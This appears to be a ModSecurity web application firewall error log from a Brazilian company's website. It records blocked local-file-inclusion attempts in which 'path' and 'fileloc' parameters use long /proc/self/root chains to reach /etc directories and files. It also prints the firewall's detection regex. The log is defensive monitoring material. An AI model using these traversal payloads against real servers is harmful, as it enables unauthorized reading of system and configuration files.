[Thu Mar 19 04:40:41.112353 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:56560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoeQkwaGbbGflqUZCCqwAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:40:42.368355 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:56562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoegbLMZ6AikZjR9UrkwAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:40:43.739204 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:56564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoe-yqAr6etmhZHNoxuAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:40:46.116084 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:56580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuofsdf6f5d65gmYZRBIQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:40:48.718074 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:51694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuogOyqAr6etmhZHNoxugAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:40:50.042776 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:51706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuogsdf6f5d65gmYZRBJgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:40:51.314906 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:51716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuog1_V7PWP6ixUYl6KSAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:40:57.213190 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:51718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoicdf6f5d65gmYZRBMgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:40:59.158308 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:38804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoi-oXxyEfFpUF8f_eqwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:41:02.339691 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:47184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuojuyqAr6etmhZHNoxxwAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:41:41.330710 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:47196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuotQbLMZ6AikZjR9UrywAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:00.905189 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:43248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoyMdf6f5d65gmYZRBhQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:02.874987 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:54630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoyhkFeYa1D6dYQnC8UAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:04.207652 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:54640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuozPu8EFLIOrSqIptrtAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:05.546465 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:54652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuozf-YZRR_7pZ7nDJbnwAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:06.909487 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:54660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuozgkwaGbbGflqUZCC6wAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:11.190992 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.241.31:53594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo0_-YZRR_7pZ7nDJbpQAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:12.671500 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:33770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo1OoXxyEfFpUF8f_exQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:13.130903 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.244.43:39274] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuo1fu8EFLIOrSqIptrtwAAAk0"]
[Thu Mar 19 04:42:14.811624 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:54668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo1uoXxyEfFpUF8f_exwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:16.125004 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:38754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo2OoXxyEfFpUF8f_eyAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:16.126128 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:33784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo2Mdf6f5d65gmYZRBmQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
